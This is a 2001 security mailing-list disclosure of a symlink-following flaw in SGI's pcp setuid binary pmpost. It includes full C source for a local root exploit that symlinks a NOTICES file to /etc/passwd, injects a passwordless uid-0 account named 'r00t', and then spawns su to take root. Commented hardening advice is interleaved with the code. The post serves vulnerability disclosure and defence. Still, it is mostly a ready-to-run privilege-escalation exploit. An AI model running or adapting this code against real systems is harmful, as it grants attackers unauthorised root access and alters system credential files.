pmpost - another nice symlink follower

From: Paul Starzetz (paulat_private)
Date: Mon Jun 18 2001 - 10:11:20 PDT


    Hi,
    
    there is a symlink handling problem in the pcp suite from SGI. The
    binary pmpost will follow symlinks; if it is setuid root, this leads to
    instant root compromise, as found on SuSE 7.1 (I doubt that this is a
    default SuSE package, though).
    
    Attached is a simple C source to demonstrate this (gcc pm.c -o pm, then
    ./pm)
    
    
    
    Ihq.
    
    
    
    ---------------------- pm.c ----------------------------
    
    /********************************************************
    *							*
    *		pmpost local root exploit		*
    *		vulnerable: pcp <= 2.1.11-5		*
    *		by IhaQueR				*
    *							*
    ********************************************************/
    
    
    
    
    #include <stdio.h>
    #include <sys/types.h>
    #include <sys/wait.h>
    #include <fcntl.h>
    #include <sys/stat.h>
    
    
    
    /*
     * Demonstration for the pmpost symlink issue described in the mail above.
     *
     * Root cause as reported: pmpost is installed setuid root and honours a
     * caller-supplied PCP_LOG_DIR, and it appears to write a NOTICES file in
     * that directory without refusing to follow a symbolic link that an
     * unprivileged user placed there, so the privileged write lands on
     * whatever the link points at (here /etc/passwd).
     *
     * Defender's checklist for any setuid helper with the same shape:
     *   - ignore, or strictly validate, environment-derived paths whenever
     *     getuid() != geteuid();
     *   - open log/notice files with O_NOFOLLOW (plus O_EXCL when creating),
     *     or fstat() after open and reject anything that is not a regular
     *     file owned by the expected user;
     *   - drop privileges before touching a user-writable directory;
     *   - reconsider whether the binary needs the setuid bit at all.
     */
    main()
    {
    const char *bin="/usr/share/pcp/bin/pmpost";
    /* buf is reused twice: first as the string handed to putenv(), later as
       the shell command; see the note at the sprintf() below. */
    static char buf[512];
    static char dir[128];
    
    
    	/* scratch directory under /tmp; rand() only serves to pick a name. */
    	srand(time(NULL));
    	sprintf(dir, "/tmp/dupa.%.8d", rand());
    
    	if(mkdir(dir, S_IRWXU))
    		_exit(2);
    
    	if(chdir(dir))
    		_exit(3);
    
    	/* The link that pmpost's privileged write is redirected through.
	   A privileged open() with O_NOFOLLOW would fail here with ELOOP. */
    	if(symlink("/etc/passwd", "./NOTICES"))
    		_exit(4);
    
    	/* Point the setuid binary at the attacker-writable directory: this is
	   the trust boundary pmpost should refuse to cross when running with
	   elevated privileges. */
    	snprintf(buf, sizeof(buf)-1, "PCP_LOG_DIR=%.500s", dir);
    
    	if(putenv(buf))
    		_exit(5);
    
    	if(!fork()) {
    		/* The argument is presumably the text pmpost appends to NOTICES. */
    		execl(bin, bin, "\nr00t::0:0:root:/root:/bin/bash", NULL);
    		_exit(1);
    	}
    	else {
    		/* pid 0: wait for any child in the caller's process group. */
    		waitpid(0, NULL, WUNTRACED);
    		chdir("..");
    		/* NOTE: putenv() does not copy its argument (glibc), so buf is still
		   the live PCP_LOG_DIR entry and this overwrite clobbers it in this
		   process; it has no effect only because the child already exec'd. */
    		sprintf(buf, "rm -rf dupa.*");
    		/* cleanup via a shell glob, run with /tmp as the working directory. */
    		system(buf);
    		execl("/bin/su", "/bin/su", "r00t", NULL);
    	}
    }
    


